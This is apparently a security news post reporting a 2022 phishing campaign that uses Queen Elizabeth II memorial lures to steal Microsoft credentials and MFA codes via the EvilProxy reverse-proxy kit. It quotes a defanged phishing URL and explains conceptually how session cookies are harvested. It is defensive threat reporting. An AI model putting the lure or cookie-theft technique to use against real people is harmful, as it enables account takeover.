The attackers aim at tricking recipients into visiting sites designed to steal their Microsoft account credentials and MFA codes.
He messages sent to the victims purported to be from Microsoft and invited recipients to an “artificial technology hub” in Queen Elizabeth II honor.
Proofpoint identified a credential #phish campaign using lures related to Her Majesty Queen Elizabeth II. Messages purported to be from Microsoft and invited recipients to an “artificial technology hub” in her honor. pic.twitter.com/RCcqpgfFfX
— Threat Insight (@threatinsight) September 14, 2022
The content of the message informs the recipients that Microsoft is launching an interactive AI memory board in honor of Her Majesty Queen Elizabeth II and invites them to contribute to its creation by accessing it using their Microsoft account credentials
Upon clicking the button embedded within the email, the recipients are redirected to the phishing landing page where they’re asked to enter their Microsoft credentials.
The phishing page (hxxps://auth[.]royalqueenelizabeth[.]com/?) has been created with the recently discovered EvilProxy phishing kit.
The landing page is hxxps://auth[.]royalqueenelizabeth[.]com/?
EvilProxy actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication – proxyfying victim’s session. Previously such methods have been seen in targeted campaigns of APT and cyberespionage groups, however, now these methods have been successfully productized in EvilProxy which highlights the significance of growth in attacks against online-services and MFA authorization mechanisms.
The first mention of EvilProxy was detected in early May 2022, this is when the actors running it released a demonstration video detailing how it could be used to deliver advanced phishing links with the intention to compromise consumer accounts belonging to major brands such as Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex and others.
EvilProxy uses the “Reverse Proxy” principle. The reverse proxy concept is simple: the bad actors lead victims into a phishing page, use the reverse proxy to fetch all the legitimate content which the user expects including login pages – it sniffs their traffic as it passes through the proxy. This way they can harvest valid session cookies and bypass the need to authenticate with usernames, passwords and/or 2FA tokens.
-Prameet
